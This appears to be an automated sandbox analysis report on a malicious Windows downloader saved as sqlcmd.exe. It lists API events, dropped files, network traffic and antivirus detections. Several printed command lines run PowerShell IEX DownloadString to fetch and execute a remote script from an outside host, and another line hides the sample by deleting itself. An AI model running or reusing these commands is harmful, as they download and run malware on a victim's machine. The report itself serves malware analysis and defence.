NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00102000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00103000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0004a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00191000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')"
cmdline	C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL
cmdline	powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')
cmdline	"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')"
cmdline	"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\sqlcmd.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 9, 2023, 9:52 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd.exe parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')" filepath: C:\Windows\sysnative\cmd.exe	1	1	0
ShellExecuteExW March 9, 2023, 9:52 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL filepath: C:\Windows\System32\cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 9, 2023, 9:52 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (12 events)

Data received	[
Data received	Wd /ýYÎ¸yº¶kÒ¤íÑHáS1DOWNGRD Knû´k¥.{»ÂôzD©rþ¼Àüª^%ÿ@Àÿ
Data received	¿
Data received	»¸10-0 ½)øËè@wfðAü0 H÷ 0210 UUS10U Let's Encrypt10 UR30 230114020524Z 230414020523Z010U .imagn.world0"0 H÷ 0 Þhgõ¿gy\|¦Õmk×Ý«{%jÄ-33²vogDx`ôHú®ý+ÂÚ_ ümÜ/uÁ¤íH]ôæ8rÖìxÁ_/&#Ï x¶÷&EØ§Ï¾¯]{!¬'ý$HLÈ?¦yWC³Jt¦ßQ¦j¬çª_Ó'+ëóXÆYCã%æÑTÏäúù'ßSdÓ>rÁ4 ×ÿúûÀê¦r¸¥Æ×?ÉÆ¯cTÊô6ôÜég«ÁsRRD¤FLÃ<2S²??Û`Ú<®c³Úßó¾är iæ¸¹ºÙIÇq£U0Q0Uÿ 0U%0++0Uÿ00U^7uE]/;¹,ÐîÙ_¹?0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0%U0 .imagn.worldimagn.world0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyõòðvz2TØ·-¶ ê8àRép2M;Ò+Á:W£RëR®=2 G0E ,C½\íçTAßòIBÂ)µåYe¿Ùê<¤5!¯^.Õéä+Á[ÇµéqÅÔMõ§bsÊo«'±9v·>û$ßMºuò9ÅºXôl]üBÏz5Ä %í´®=2G0E!÷"Rìûâ%ä0Tªñ:?umnbáÌÅ,VD; bÐÑÛÔwâÆù éF×üÐÄÙÆÉNb 0 H÷ Ö_ýx1×D¤¬ñÐP"Xp>êsW_åô};DÌ¼÷ÜÞÙØ a×#Âàæ²íõ=/ºîÛGoFo4¾iÞòÚ2äÀ¢Ã%ÓÈø¤9§u~èrEQ _òÒ_î`×<z7Õµ L}-YnåÔüÜÎ²¨ð5Ä ]))×³Ü0Õ¢êDèrÄ¬£¨õÌ¶)¬áµ¾ãôÛéÊ,:ö´þí(cuNáê.7+úW!W(UÅúå>ÿì¾¿4¯ÌÕà-9zÑµÕóû´ém¾èÅF?¤ñ00þ +JÏ§SöÖ.%§_Z0 H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4\|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH¡i®%u»ÌRõíQ¡Û£00Uÿ0U%0++0Uÿ0ÿ0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 H÷ ÊNG>£÷D¼Õgx²cuM=3erT- êÃíø ¿_Ì·p·n;ö^Þä ¦ï²ç¢µ<Î´í9ç\|%Gæen?FôÙðÎ+îTÎ¼'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'ÃÈ¹Î\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1uCØUrÄ)÷Ä]NÈ®F0×ò_¡y»ç^páÃ¹Üaq%¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê\|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎUþéIdÔNÊ´[Às¨«¸GÂd0`0H @w!7ÔéB¸îvª<d ·0 H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷uÂ¢þõjnöO(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG\|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙî¿³J?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$É§Z£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP\|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)Ìº½¢A¡ÖñÂ¶ð¨\|;F¨HÜvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO£F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0Ä§±¤{,qúÛáKuÿÄ`0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 *H÷ slnÿRÐ®ÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿Nïàë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìãÞã8ú¤}±ØèI+èkO8w.ùÝç9
Data received	K
Data received	GAïgv,áÚ*- bdÐk¬%Gd Ë·lÊQ:ÉåõïÙÓeÒïxYØW9Ò¡)ÖmªjWâuÏþÁF`µ´¶fC¥: áÄa¥vN Ó)§ãL6Ê f÷¶K¬VP~¢eVåsZ#ÂÝ¿ÍX7£Dz×Ì#(lc«bÞPu_DK`3ºT%(Äª7ykOú¼§6õOýNúï·â£ld°àk£ëpÊcæ S¬¸~Ý(v%êwÛéZâ ð8ýÖ12 ±@¨óâùÕæò[ëß+v`O\Tze¸4ò4É× Z ×;±¡NÁ^d{.m1$r'£è c=³¢Ç>ÁäLm.æÂuM\
Data received
Data received
Data received
Data received
Data received	0
Data received	æÃ:Di½¯ºA»Lè?¾S°5CÚD};/¸T8/×Gjå¼Ê¡eiåþ

Poweshell is sending data to a remote host (2 events)

Data sent	rnd -ó''jH¼'ÜFm·9:u÷_4àèG#¢/5 ÀÀÀ À 28-ÿwww.imagn.world
Data sent	FBAÆÇ!â'K´«@ªÀ5Ðh·q»ôFWÒËDTÙW[µ¤b^ÚI-#BµxõêÕÔ*Ü3á"öèÞ¿0êö#à&Fp: :«ø¬ì2LõN[åÕl©Ídç³²T{ $áíüÜÓ.

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 9, 2023, 9:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL
cmdline	ping 127.0.0.1
cmdline	"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send March 9, 2023, 9:53 a.m.	buffer: rnd -ó''jH¼'ÜFm·9:u÷_4àèG#¢/5 ÀÀÀ À 28-ÿwww.imagn.world socket: 1252 sent: 119	1	119
send March 9, 2023, 9:53 a.m.	buffer: FBAÆÇ!â'K´«@ªÀ5Ðh·q»ôFWÒËDTÙW[µ¤b^ÚI-#BµxõêÕÔ*Ü3á"öèÞ¿0êö#à&Fp: :«ø¬ì2LõN[åÕl©Ídç³²T{ $áíüÜÓ. socket: 1252 sent: 134	1	134
WSASend March 9, 2023, 9:53 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1840		0

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

MicroWorld-eScan	Dropped:Generic.BAT.Downloader.D.6F6494F3
FireEye	Generic.mg.fc4462b1448b7db9
McAfee	Artemis!FC4462B1448B
VIPRE	Dropped:Generic.BAT.Downloader.D.6F6494F3
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:Win32/Kryptik.3404d64a
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Generic.BAT.Downloader.D.6F6494F3
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Kryptik.HROL
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.Win32.Coins.gen
BitDefender	Dropped:Generic.BAT.Downloader.D.6F6494F3
Avast	CrypterX-gen [Trj]
Sophos	Generic ML PUA (PUA)
McAfee-GW-Edition	BehavesLike.Win32.NetLoader.ch
Emsisoft	Dropped:Generic.BAT.Downloader.D.6F6494F3 (B)
Webroot	W32.Downloader.Gen
MAX	malware (ai score=82)
Gridinsoft	Ransom.Win32.Sabsik.sa
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	Win32.Trojan-Downloader.Generic.L5MVQP
AhnLab-V3	Trojan/Win.PowershellDownloader.R561248
Acronis	suspicious
BitDefenderTheta	Gen:NN.ZexaF.36308.myW@auLYVBdi
ALYac	Dropped:Generic.BAT.Downloader.D.6F6494F3
VBA32	suspected of Trojan.Downloader.gen
Cylance	unsafe
Rising	Trojan.Generic@AI.100 (RDML:Su5sB/wAsy01K5Ai3qViLg)
Fortinet	W32/Kryptik.HROL!tr
AVG	CrypterX-gen [Trj]

sqlcmd.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All